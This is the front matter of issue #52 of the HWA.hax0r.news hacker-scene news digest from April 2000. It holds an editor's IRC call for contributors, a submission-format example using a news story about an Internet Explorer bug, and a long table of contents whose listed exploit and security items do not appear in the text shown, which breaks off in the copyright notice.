[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                       <=-[ HWA.hax0r.news ]-=>                         =
==========================================================================
[=HWA 2000=]    Number 52 Volume 2 Issue 4 1999                Apr 2000
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
=                        "ABUSUS NON TOLLIT USUM"                        =
==========================================================================

Editor: Cruciphux (cruciphux@dok.org)

A Hackers Without Attitudes Production.
(c) 1999, 2000

http://welcome.to/HWA.hax0r.news/

*** NEW WEB BOARD NOW ACTIVE ***
http://discserver.snap.com/Indices/103991.html

==========================================================================

=--------------------------------------------------------------------------=
                                 Coverage
=--------------------------------------------------------------------------=

This is #52 covering Mar 13th to April 9th, 2000

** 564 People are on the email notify list as of this writing.
   see note below in the Help Out! section re:distribution.

==========================================================================

=--------------------------------------------------------------------------=
                                 Help Out!
=--------------------------------------------------------------------------=

WANT TO HELP? like what can I do? some answers to common questions, taken
straight from IRC since, well why re-write it? :)

** Regarding the people on the email notification list with listbot.

We now have a new listserv system setup with help from the generous people
of the CCC (Chaos Computer Club) in Germany.
If you haven't heard of CCC or don't know who they are you've been living
under a rock ;) I am still working on the system; it may or may not be ready
for use as of this release, certainly it should be accessible for the next
one. Soon you will be able to receive the newsletter/zine directly delivered
to your inbox (yay!). Stay tuned - Ed

Early one night in #Hwa.hax0r.news ...

Cruciphux: so do you really need help? cause I can start getting articles
           for ya if you want/need them
yes damnit I do need help
so what do I do.....look for articles...copy and paste them..... then hand
them to you?
what do you want to do?
if you wanna do that sure, email em to me like that
must have a source and or url though
ok
ppl always forget urls/sources and I can't print it without a source
if u do and I haven't already put the info in you 'win' a
  Contributed by: space sn00zer!
line under the article :)
hehe
and if yer good at it and get stuff I've never seen (like isn't on my excite
newsbot list or on HNN etc) then you get promoted to 'staff' etc
I should put this in there actually so ppl know what to expect
ok cool
and original articles?
i'd kill for good original material heh
stress on the 'good' but i'm not too picky if someone wants to make a fool
of themselves in public. :-o
so what kinda of articles.....anything? from programming to hacking....etc?
pretty much heh
technology, radio, science if it has a techno slant, and of course
internet/web security and hacking related
u know the drill
yeah also just checkin... heh
I need someone to do 'research' on web site defacements
an adjunct to what attrition does
like tell me about interesting defacements, I just print the sites list i
get from attrition
like how....person who defaced......??.......??
ohh ok
theres a mailing list you can get on that tells you when sites get cracked
thats a biggie i'm gonna be asking for in this issue
print the 'good' defacements (shit with an angle) and track down/identify
defacers and groups etc
ok cool:)
with an eye towards possible profiles (group) and interviews (if they're
doing something interesting)
anything else?
that looks good:)
it doesn't seem that hard when you hear about people doing it
k lemme know if you wanna do anything and lemme know what you want to do etc
but now it sure seems harder than expected heh
but it'll give me something to do at least
well I do everything myself right now in free time and there are areas that
i'd like to follow up on and I just don't have the time
so if ppl are willing to help i can keep putting out and hopefully things
will get better too.
well....I'll do anything you want me to do.....but following up on
defacements and getting articles seems good right now
otherwise i'd have to think about either downsizing or closing down and I
don't want to do that really.
ok
good stuff local and 'small' stuff like whats going on at your schools
computer lab ie: security policies is good angles for writing your own
stuff too if that tickles your fancy
doesn't have to be major world news *g*
ok
*** Quits: narq (I am free of all prejudices. I hate everyone equally)

-=-

And, sending in articles etc...

Instead of emailing me this: (txt formatted to 80 cols)

<->

Patching IE Security, Yet Again

Security vulnerability affects the Win 2000 browser.

Windows 2000 is finally here. And so is a patch for a security vulnerability
in the Internet browser that is bundled with the new operating system.
Microsoft issued the patch on Wednesday, the eve of the release of its
much-delayed operating system.
The bug, which Microsoft calls the Image Source Redirect vulnerability,
makes it possible for a malicious Web site operator to read certain types of
files on the computers of visitors using Internet Explorer versions 4.0,
4.01, 5.0, and 5.01. This means that the iteration of IE that is distributed
with Windows 2000, version 5, also is affected by the bug.

When you want to view a new page with a different domain than the one
currently being viewed, a Web server sends the page to your IE browser
window. IE then checks the server's permissions on the new page. The
vulnerability makes it possible for a Web server to open a browser window
to a file stored on the IE user's computer, and then switch to a page in the
server's domain, gaining access to the contents of the user's files in the
process, Microsoft says in a statement.

Any data that can be seen is accessible only for a short period of time,
and the Web site operator would need to know, or guess, the names and
locations of files. The operator would also be able to view only file types
that can be opened in a browser window, including .txt files, Microsoft
says.

http://www.pcworld.com/pcwtoday/article/0,1510,15340,00.html

<->

:: YOU can go ahead and do some editing yourself and send it like this: ::

<->

Patching IE Security, Yet Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by SugarKing

Security vulnerability affects the Win 2000 browser.

Source: PCworld
url: http://www.pcworld.com/pcwtoday/article/0,1510,15340,00.html

Windows 2000 is finally here. And so is a patch for a security vulnerability
in the Internet browser that is bundled with the new operating system.
Microsoft issued the patch on Wednesday, the eve of the release of its
much-delayed operating system.

The bug, which Microsoft calls the Image Source Redirect vulnerability,
makes it possible for a malicious Web site operator to read certain types of
files on the computers of visitors using Internet Explorer versions 4.0,
4.01, 5.0, and 5.01. This means that the iteration of IE that is distributed
with Windows 2000, version 5, also is affected by the bug.

When you want to view a new page with a different domain than the one
currently being viewed, a Web server sends the page to your IE browser
window. IE then checks the server's permissions on the new page. The
vulnerability makes it possible for a Web server to open a browser window
to a file stored on the IE user's computer, and then switch to a page in the
server's domain, gaining access to the contents of the user's files in the
process, Microsoft says in a statement.

Any data that can be seen is accessible only for a short period of time,
and the Web site operator would need to know, or guess, the names and
locations of files. The operator would also be able to view only file types
that can be opened in a browser window, including .txt files, Microsoft
says.

@HWA

<->

:: Doesn't seem like much but saves me a bunch of work and I can plug it
   straight into the zine text... ::

-=-

Etc .. any other questions/comments/ideas/etc email me, you know the addy...

-=-

@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
#                                                                         @
@  The HWA website is sponsored by CUBESOFT communications I highly       #
#  recommend you consider these people for your web hosting needs,        @
@                                                                         #
#  Web site sponsored by CUBESOFT networks http://www.csoft.net           @
@  check them out for great fast web hosting!                             #
#                                                                         @
#  http://www.csoft.net/~hwa                                              @
@                                                                         #
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

=--------------------------------------------------------------------------=
                                 Synopsis
=--------------------------------------------------------------------------=

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general.
This includes coverage of general security issues, hacks, exploits,
underground news and anything else I think is worthy of a look-see.
(remember I'm doing this for me, not you, the fact some people happen to get
a kick/use out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the likes
of publications such as CuD or PHRACK or with news sites such as AntiOnline,
the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN, nor
could any other 'digest' of this type do so. It *is* intended however, to
complement such material and provide a reference to those who follow the
culture by keeping tabs on as many sources as possible and providing links
to further info. It's a labour of love and will be continued for as long as
I feel like it; I'm not motivated by dollars or the illusion of fame. Did
you ever notice how the most famous/infamous hackers are the ones that get
caught? There's a lot to be said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ...
=-----------------------------------------------------------------------=

  "If life is a waste of time and time is a waste of life, then let's all
   get wasted and have the time of our lives" - kf

=--------------------------------------------------------------------------=
                                  EFnet
=--------------------------------------------------------------------------=

Catch us on Internet Relay Chat, Eris Free Net...

/join #HWA.hax0r.news

**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed        ***
***                                                                    ***
*** please join to discuss or impart news on the zine and around the   ***
*** scene or just to hang out, we get some interesting visitors you    ***
*** could be one of em.                                                ***
***                                                                    ***
*** Note that the channel isn't there to entertain you, its purpose is ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips  ***
*** it's the place to be, just remember we're not #hack or #chatzone...***
**************************************************************************

=--------------------------------------------------------------------------=
                                 Contents
=--------------------------------------------------------------------------=

=--------------------------------------------------------------------------=
[ INDEX ]  HWA.hax0r.news #52
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=

00.0 .. LEGAL & COPYRIGHTS ..............................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. THIS IS WHO WE ARE ..............................................

ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and
loosely translated it means "Just because something is abused, it should
not be taken away from those who use it properly". This is our new motto.

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

  "The three most dangerous things in the world are a programmer with a
   soldering iron, a hardware type with a program patch and a user with
   an idea." - Unknown

01.0  .. GREETS ...........................................................
01.1  .. Last minute stuff, rumours, newsbytes ............................
01.2  .. Mailbag ..........................................................
02.0  .. From the Editor...................................................
03.0  .. Clearing up a nasty screw up in issue #51, here's what happened...
04.0  .. HACK.CO.ZA AND A PLEA FOR HOSTING, +LOST EMAIL!...................
05.0  .. WebTV hit by "Melissa-Type" virus.................................
06.0  .. BlaznWeed interview, background info, exploit code and Sect0r.....
07.0  .. plusmail cgi exploit..............................................
08.0  .. 2600 activism against the MPAA....................................
09.0  .. Microsoft sends magazine full versions of Windows 2000............
10.0  .. HNN:Mar 13th:Mexican Rebels Breached Pentagon Security ...........
11.0  .. HNN:Mar 13th:Online Guerrilla War Rages In Brazil ................
12.0  .. HNN:Mar 13th:French Bank Card Algorithm Released .................
13.0  .. HNN:Mar 13th:Still No Suspects in DDoS Attacks ...................
14.0  .. HNN:Mar 13th:Japanese Pirates Busted .............................
15.0  .. HNN:Mar 13th:Online Handles Impose Fear ..........................
16.0  .. HNN:Mar 13th:Vendors Still Making Insecure Software ..............
17.0  .. HNN:Mar 14th:Smart Card Inventor Issues Challenge ................
18.0  .. HNN:Mar 14th:MPAA Continues to Harass In Fight Over DeCSS ........
19.0  .. HNN:Mar 14th:Tracking Down Coolio.................................
20.0  .. HNN:Mar 14th:DOJ Launches Cybercrime Site ........................
21.0  .. HNN:Mar 14th:China Relaxes Crypto Rules ..........................
22.0  .. HNN:Mar 14th:Stallman on UCITA ...................................
23.0  .. HNN:Mar 14th:What Exactly Does TRUSTe Mean Anyway?................
24.0  .. HNN:Mar 15th:UCITA Signed By Governor in Virginia ................
25.0  .. HNN:Mar 15th:RIP Goes Before Commons Today .......................
26.0  .. HNN:Mar 15th:Security Patch Locks Out Users ......................
27.0  .. HNN:Mar 15th:DNA Used for Steganography ..........................
28.0  .. HNN:Mar 15th:Bugging SAT Phones ..................................
29.0  .. HNN:Mar 15th:More and more EZines ................................
30.0  .. HNN:Mar 16th:Army on Alert Over CyberAttack Fear .................
31.0  .. HNN:Mar 16th:NASA Fears CyberAttack From Brazil ..................
32.0  .. HNN:Mar 16th:FBI Site Hit by DOS Again ...........................
33.0  .. HNN:Mar 16th:Teenager Arrested in Online Bank Scam ...............
34.0  .. HNN:Mar 16th:Former Employee Arrested For Attack On Company ......
35.0  .. HNN:Mar 16th:PlayStation2 can Play US DVD ........................
36.0  .. HNN:Mar 16th:ISTF Releases Security Recommendations ..............
37.0  .. HNN:Mar 17th:485,000 Credit Cards #s Stolen, Found on Gov Comp....
38.0  .. HNN:Mar 17th:Brazil Gov Sites Suffering Under DDoS Attacks .......
39.0  .. HNN:Mar 17th:Secret Service Harassing Bernie S Again .............
40.0  .. HNN:Mar 17th:Secret Service to Work with Citicorp to Fight Fraud..
41.0  .. HNN:Mar 17th:Computer History Lecture Series .....................
42.0  .. HNN:Mar 17th:Australian Police To Increase Online Presence .......
43.0  .. HNN:Mar 17th:Apex DVD Defeats Region and Macrovision .............
44.0  .. HNN:Mar 20th:First Malicious Code Directed at WebTV ..............
45.0  .. HNN:Mar 20th:Liberia Claims Attack In CyberWar ...................
46.0  .. HNN:Mar 20th:Judge Bans Anti-Filter Software .....................
47.0  .. HNN:Mar 20th:We Spy To Prevent Bribes ............................
48.0  .. HNN:Mar 20th:LAPD Tells Parody Site To Chill .....................
49.0  .. HNN:Mar 20th:New Windows Worm Virus ..............................
50.0  .. HNN:Mar 20th:GNIT Now Freeware ...................................
51.0  .. HNN:Mar 20th:Online Criminals Labeled Boffins ....................
52.0  .. HNN:Mar 21st:Conflict In Kashmir Continues Online ................
53.0  .. HNN:Mar 21st:Army Weapon Systems At Risk of Cyber Attack .........
54.0  .. HNN:Mar 21st:2600 AU to Broadcast DeCSS ..........................
55.0  .. HNN:Mar 21st:CIA Monitoring Upheld by Court ......................
56.0  .. HNN:Mar 21st:Make Your Reservations for RootFest Now! ............
57.0  .. HNN:Mar 22nd:Cybercrime On The Rise ..............................
58.0  .. HNN:Mar 22nd:The Next Version of Windows Leaked ..................
59.0  .. HNN:Mar 22nd:Toronto Business Held For Extortion .................
60.0  .. HNN:Mar 22nd:Is the Census Secure? ...............................
61.0  .. HNN:Mar 23rd:Insurance Co. Reveals Personal Info on Web ..........
62.0  .. HNN:Mar 23rd:Cisco Admits to Big Hole in PIX Firewall ............
63.0  .. HNN:Mar 23rd:College To Offer Online Crime Fighting Courses ......
64.0  .. HNN:Mar 23rd:Pittsburgh Gets Computer Crime Task Force ...........
65.0  .. HNN:Mar 23rd:Business May Be Protected Against FOIA ..............
66.0  .. HNN:Mar 23rd:Teenagers To Receive Deterrent Sentences ............
67.0  .. HNN:Mar 24th:2600 Retains Big Name Attorneys - Trial Date Set ....
68.0  .. HNN:Mar 24th:Max Vision Indicted in San Jose .....................
68.1  .. KYZSPAM: More on Max Vision bust..................................
69.0  .. HNN:Mar 24th:Koreans Attempt to Learn Security Secrets ...........
70.0  .. HNN:Mar 24th:Rack Mount Your iMac ................................
71.0  .. HNS:Mar 24th:SECRETS STOLEN.......................................
72.0  .. HNS:Mar 24th:PATCH RELEASED BY TREND MICRO........................
73.0  .. HNS:Mar 24th:PRIVACY ISSUES.......................................
74.0  .. HNS:Mar 24th:TARGETING ONLINE SCAMMERS............................
75.0  .. HNS:Mar 24th:FEARS OF FREENET.....................................
75.1  .. (More) Anonymous net access aiding and abetting online criminals?.
76.0  .. HNS:Mar 24th:FEDERAL CIO NEEDED...................................
77.0  .. HNS:Mar 24th:DETERRENT SENTENCES..................................
78.0  .. HNS:Mar 23rd:SENSITIVE DATA MADE PUBLIC...........................
79.0  .. HNS:Mar 23rd:ALTERING WEB SITES...................................
80.0  .. HNS:Mar 23rd:SECURITY BREACHES....................................
81.0  .. HNS:Mar 23rd:ATTACK COSTS RISE....................................
82.0  .. HNS:Mar 23rd:INDICTED FOR HACKING NASA SERVERS....................
83.0  .. HNS:Mar 23rd:CALDERA SYSTEMS SECURITY ADVISORY....................
84.0  .. HNS:Mar 23rd:REMOTE SECURITY MANAGEMENT...........................
85.0  .. HNS:Mar 23rd:"ANTI-ARAB" BUG......................................
86.0  .. HNS:Mar 23rd:OFFICE 2000 PATCHES..................................
87.0  .. HNS:Mar 23rd:SHARING INFORMATION..................................
88.0  .. HNS:Mar 23rd:MONITORING WITH GOOD RESULTS.........................
89.0  .. HNS:Mar 23rd:CRIME FIGHTING LAB...................................
90.0  .. HNS:Mar 23rd:HUNTING CROATIAN PIRATES.............................
91.0  .. HNS:Patch available for OfficeScan vulnerability..................
92.0  .. HNS:Gpm-root problems.............................................
93.0  .. HNS:Esafe Protect Gateway (CVP) problems..........................
94.0  .. HNS:Bug in Apache project: Jakarta Tomcat.........................
95.0  .. HNS:MS SECURITY BULLETIN #18......................................
96.0  .. HNS:S.A.F.E.R. Security Bulletin 000317...........................
97.0  .. HNS:Decon fix for con/con is vulnerable...........................
98.0  .. HNS:Cerberus Information Security Advisory........................
99.0  .. HNS:Malicious-HTML vulnerabilities at deja.com....................
100.0 .. HNS:Certificate Validation Error in Netscape Browsers.............
101.0 .. HNS:"OfficeScan DoS & Message Replay" Vulnerability...............
102.0 .. HNS:MS Security bulletin #17......................................
103.0 .. HNS:Georgi Guninski security advisory #9..........................
103.1 .. PSS:More MSIE crashing info by NtWakO.............................
104.0 .. HNS:Drive Mappings in Interactive Login...........................
105.0 .. HNS:DoS Attack in MERCUR WebView .................................
106.0 .. HNS:Problem with Firewall-1.......................................
107.0 .. HNS:Freeze Distribution of IE 5.0, 5.0a, and 5.0b.................
108.0 .. HNS:Extending the FTP "ALG" vulnerability ........................
109.0 .. FreeBSD-SA-00:08: Lynx overflows..................................
110.0 .. Curador? BUSTED...................................................
111.0 .. PSS: Shaft Distributed DoS tool analysis Sven Dietrich............
111.1 .. PSS: Shaft Node/Master analysis by Rick Wash & Jose Nazario.......
112.0 .. Wrapster, the Napster hack fires up the trading fires.............
113.0 .. AceFTP vulnerability by Armour....................................
114.0 .. Pursuit Zine #1 (Aug 99)..........................................
115.0 .. SecurityFocus.com Newsletter 33...................................
116.0 .. You can get into trouble for hacking!.............................
117.0 .. SSHD v2.0.11< (old) Watch your version numbers!...................
118.0 .. BBC:"Outdoing the hackers"........................................
119.0 .. HNN:Mar 27th:Curador Busted In Wales (See section 110.0 for more).
120.0 .. HNN:Mar 27th:Inferno Busted in Brazil ............................
121.0 .. HNN:Mar 27th:OSU Students Accused of Stealing Bandwidth ..........
122.0 .. HNN:Mar 27th:PalmPilot WarDialer Released ........................
123.0 .. HNN:Mar 27th:Mi5 Computer Stolen .................................
124.0 .. HNN:Mar 27th:"HNN Wins Bad Ass Media Award".......................
125.0 .. HNN:Mar 28th:French Ban Anonymous Internet........................
126.0 .. HNN:Mar 28th:Canada Labeled Hot bed of Computer Terrorism ........
127.0 .. HNN:Mar 28th:2600 Under Fire From NBC ............................
128.0 .. HNN:Mar 28th:Takedown Debuts in France ...........................
129.0 .. HNN:Mar 28th:Mattel Buys Rights to CPHack ........................
130.0 .. HNN:Mar 28th:Cyber Security Bill Passes Committee ................
131.0 .. HNN:Mar 28th:Census Gets NSA to Look at Security .................
132.0 .. HNN:Mar 28th:Icomlib 1.0.0 Final Released ........................
133.0 .. HNN:Mar 28th:China Bans MP3s .....................................
134.0 .. HNN:Mar 29th:MostHated to Plead Guilty ...........................
135.0 .. HNN:Mar 29th:FBI Wants New Laws to Make Their Work Easier ........
136.0 .. HNN:Mar 29th:Banks Warned to Carefully Screen New Recruits .......
137.0 .. HNN:Mar 29th:CPHack Was GPL'd, Mattel Left Holding the Bag........
138.0 .. HNN:Mar 29th:White House Staffer Gives Away Phone Access Codes....
139.0 .. HNN:Mar 29th:Another DVD Work Around on PlayStation 2.............
140.0 .. HNN:Mar 29th:Interview with Attrition Staff Posted................
141.0 .. HNN:Mar 29th:The Unfairness of Computer Crime Sentences...........
142.0 .. HNN:Mar 29th:@tlanta Con to be Held this Weekend..................
143.0 .. HNN:Mar 30th:MostHateD Busted for Burglary and Theft..............
144.0 .. HNN:Mar 30th:Miramax Sued for Fugitive Game.......................
145.0 .. HNN:Mar 30th:Glassbook Shattered..................................
146.0 .. HNN:Mar 30th:Yahoo Sued Over Piracy...............................
147.0 .. HNN:Mar 30th:Italian University Attacked by Brazilian Intruders...
148.0 .. HNN:Mar 30th:E-commerce Site Accuses Other of Intrusions..........
149.0 .. HNN:Mar 30th:Australia To Protect Privacy of Works................
150.0 .. HNN:Mar 31st:Y2Hack Goes on in Israel.............................
151.0 .. HNN:Mar 31st:Another Member of Inferno.br Identified in Brazil....
152.0 .. HNN:Mar 31st:China Sets Up Security Test Center...................
153.0 .. HNN:Mar 31st:Hackers Probe Physical Security of MIT...............
154.0 .. HNN:Mar 31st:DVD for Linux is Now Legal...........................
155.0 .. HNN:Mar 31st:Y2K Survivalists Come Out of Hiding..................
156.0 .. CoreZine: New zine by lamagra of b0f..............................
157.0 .. Paper:Some Extra Security In The Linux Kernel - Auditfile by {}...
158.0 .. Lets hack an NT box...how they are being defaced & how to secure..
159.0 .. Hijack any .nu domain box (DoS/redirection/hijack)................
160.0 .. The dreaded and most pheared return of the infamous GOAT!.........
161.0 .. b0f: exploit code to hang any linux machine by eth0...............
162.0 .. HNN:Apr 3rd:NIPC Issues Alert on New Self-Propagating 911 Script..
163.0 .. HNN:Apr 3rd:Mixter Convicted of "Computer Sabotage" ..............
164.0 .. HNN:Apr 3rd:Forget Cookies, Worry About Cache ....................
165.0 .. HNN:Apr 3rd:Identity Theft On the Rise ...........................
166.0 .. HNN:Apr 3rd:Computer Crime Laws ..................................
167.0 .. HNN:Apr 4th:Computers Turned Into Bombs Via The Net...............
168.0 .. HNN:Apr 4th:GlassBook Knew of Vulnerabilities in King Book........
169.0 .. HNN:Apr 4th:Alabama Man Charged With 5k In Damage to ISP..........
170.0 .. HNN:Apr 4th:Federal Web Site Security Called Weak (Again).........
171.0 .. HNN:Apr 4th:Germans Propose Strike Force For Net Defense..........
172.0 .. HNN:Apr 4th:New Mags are Now Available............................
173.0 .. HNN:Apr 5th:De Beers Releases Personal Info.......................
174.0 .. HNN:Apr 5th:CFP In Toronto........................................
175.0 .. HNN:Apr 5th:Enigma Machine Stolen From Museum.....................
176.0 .. HNN:Apr 5th:Thailand Police Form Cyber Crime Panel................
177.0 .. HNN:Apr 5th:40 Percent of Chinese Web Sites Attacked..............
178.0 .. HNN:Apr 6th:DoubleClick Wins Privacy Award........................
179.0 .. HNN:Apr 6th:ACLU Appeals CPHack Ruling............................
180.0 .. HNN:Apr 6th:MPAA Attempts to Get Ruling Against Linking...........
181.0 .. HNN:Apr 6th:Enigma Suspect Busted.................................
182.0 .. HNN:Apr 6th:FBI and Privacy Advocates Square Off in Debate........
183.0 .. HNN:Apr 6th:DDoS Attacks Contributed to Stock Market Losses.......
184.0 .. HNN:Apr 6th:History of the L0pht, Part 1..........................
185.0 .. HNN:Apr 7th:Junger wins in Appeals Court - Code Declared Speech...
186.0 .. HNN:Apr 7th:Bullet to Scan Hard Drives of Web Site Visitors.......
187.0 .. HNN:Apr 7th:Links to Web Sites Illegal............................
188.0 .. HNN:Apr 7th:British Companies Complacent..........................
189.0 .. HNN:Apr 7th:Trio Becomes First Internet Crime Conviction for Hong Kong
190.0 .. HNN:Apr 7th:Census Afraid of Electronic Intrusion.................
191.0 .. HNN:Apr 7th:Hardware Key Logger Introduced........................
192.0 .. HNN:Apr 7th:Napalm Issue 4........................................
193.0 .. HNS:Apr 8th:NEW KIND OF SECURITY SCANNER..........................
194.0 .. HNS:Apr 8th:WAYS TO ATTACK........................................
195.0 .. HNS:Apr 7th:STOLEN ACCOUNTS.......................................
196.0 .. HNS:Apr 7th:JAILED FOR SIX MONTHS.................................
197.0 .. HNS:Apr 7th:PcANYWHERE WEAK PASSWORD ENCRYPTION...................
198.0 .. HNS:Apr 7th:NET PRIVACY TOOLS.....................................
199.0 .. HNS:Apr 7th:SECURITY ADDITIONS....................................
200.0 .. HNS:Apr 7th:COOKIES...............................................
201.0 .. HNS:Apr 7th:SECURE E-MAIL SERVICE.................................
202.0 .. HNS:Apr 7th:ONLINE MUGGERS........................................
203.0 .. HNS:Apr 6th:SURVEY BY DTI.........................................
204.0 .. HNS:Apr 6th:COMPUTER CODES PROTECTED..............................
205.0 .. HNS:Apr 6th:RELEASED AFTER CODE MACHINE THEFT.....................
206.0 .. HNS:Apr 6th:CYBERPATROL BLOCK LIST................................
207.0 .. HNS:Apr 5th:CRYPTO REGULATIONS....................................
208.0 .. HNS:Apr 5th:GFI AND NORMAN TEAM UP................................
209.0 .. HNS:Apr 5th:MASTERCARD OFFER VIRUS REPAIR SERVICE.................
210.0 .. HNS:Apr 5th:BUFFER OVERFLOWS......................................
211.0 .. HNS:Apr 5th:PIRACY................................................
212.0 .. HNS:Apr 5th:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER..................
213.0 .. HNS:Apr 5th:GROUP APPEALS DVD CRYPTO INJUNCTION...................
214.0 .. HNS:Apr 5th:VIRUS BLOWS A HOLE IN NATO'S SECURITY.................
215.0 .. HNS:Apr 4th:FIGHT SPAM WITH SPAM..................................
216.0 .. HNS:Apr 4th:REALPLAYER BUFFER OVERFLOW............................
217.0 .. ISN:Mar 18th:Serbs hacked Britain's top-secret military computers.
218.0 .. March 15th: CRYPTOGRAM newsletter.................................
219.0 .. ISN:Mar 18th:Microsoft fends off hackers with Windows 2000........
220.0 .. ISN:Feds Behind Recent Massive Web Hacking/Fwd....................
221.0 .. ISN:Hacker 'Gatsby' Gets 18-Month Sentence........................
222.0 .. ISN:Naval officer in hot water over policy........................
223.0 .. ISN:Police to step up fight against e-crime.......................
224.0 .. ISN:Developers blasted on security................................
225.0 .. ISN:"Islands in the clickstream, in defense of hacking"...........
226.0 .. ISN:Man angry at employer swallows own head.......................
227.0 .. ISN:Nasa division battles the hack from ipanema...................
228.0 .. ISN:Toys'R'Us.....................................................
229.0 .. ISN:Computer expert accused of hacking............................
230.0 .. ISN:Disney and Miramax Sued for 'Hacking'.........................
231.0 .. ISN:Hacker posts own version of Gore's speech online..............
232.0 .. ISN:Bennett leads cyber defense...................................
233.0 .. ISN:Hackers rue blurred line between curiosity, vandalism.........
234.0 .. ISN:Curador worked as e-commerce consultant.......................
235.0 .. ISN:White house official charged with spreading phone codes.......
236.0 .. ISN:Hackers hold conference in Israel.............................
237.0 .. ISN:Old school MIT stylie "hacking" still makes news?.............
238.0 .. ISN:US Census tests security......................................
239.0 .. ISN:Visa program targets online fraud.............................
240.0 .. ISN:GAO lists security bargains...................................
241.0 .. ISN:DeBeers leaks customer info...................................
242.0 .. ISN:Cybersleuths want to hack bill of rights......................
243.0 .. ISN:Third laptop gets lifted......................................
244.0 .. ISN:Government suck rocks at busting computer criminals...........
245.0 .. CanSecWest/core00 Canadian Security Conf..........................
246.0 .. PSS: BeOs Network DoS.............................................
247.0 .. PSS: TESO Security Advisory BinTec router weakness................
248.0 .. b0f: namedscan.c..................................................
249.0 .. PSS:Advisory: MailForm v1.91 for Windows 95 and NT 4.0............
250.0 .. PSS: CGI rmp_query scanner........................................
251.0 .. PSS: New ircii exploit............................................
252.0 .. PSS:Cerberus Information Security Advisory (CISADV000330).........
253.0 .. PSS:Win32 Realplayer 6/7 Buffer Overflow..........................
254.0 .. ISS Security summary data sheet...................................
255.0 .. PSS: suse kreatecd root compromise................................
256.0 .. PSS: irix object server remote root exploit.......................
257.0 .. PSS: Sun bind advisory............................................
258.0 .. Cyberprofiling....................................................
259.0 .. mIRC 5.7 Exploit code.............................................
260.0 .. Spaghetti proxy server exploit code...............................
261.0 .. schoolbus.c - netbus 1.7 client exploit crashes script kids box...
262.0 .. Protocol reverse engineering using Sub7 as an example.............
263.0 .. Essay:Elf Orin: The meaning of being a hacker.....................
264.0 .. Linux 2.2.x masq tunnel/hijack scenario...........................
265.0 .. AWARD Bios password cracker .c source code........................
266.0 .. Locked out? default BIOS/CMOS password list.......................

=-------------------------------------------------------------------------=

AD.S   .. Post your site ads or etc here, if you can offer something in
          return thats tres cool, if not we'll consider ur ad anyways so
          send it in. Ads for other zines are ok too btw, just mention us
          in yours, please remember to include links and an email contact.

Ha.Ha  .. Humour and puzzles ............................................
          Oi! laddie! send in humour for this section! I need a laugh and
          it's hard to find good stuff... ;)

SITE.1 .. Featured site, .................................................
H.W    .. Hacked Websites ................................................
A.0    .. APPENDICES......................................................
          * COMMON TROJAN PORTS LISTING...................................
A.1    .. PHACVW linx and references......................................
A.2    .. Hot Hits (.gov and .mil + other interesting traffic on our site)
A.3    .. Mirror Sites list...............................................
A.4    .. The Hacker's Ethic 90's Style...................................
A.5    .. Sources.........................................................
A.6    .. Resources.......................................................
A.7    .. Submission information..........................................
A.8 .. Mailing lists information...................................... A.9 .. Whats in a name? why HWA.hax0r.news??.......................... A,10 .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again). A.11 .. Underground and (security?) Zines.............................. * Feb 2000 moved opening data to appendices, A.2 through A.10, probably more to be added. Quicker to get to the news, and info etc... - Ed =--------------------------------------------------------------------------= @HWA'99, 2000 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ | | ___ __ _ __ _| | | | / _ \/ _` |/ _` | | | |__| __/ (_| | (_| | | |_____\___|\__, |\__,_|_| |___/ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES 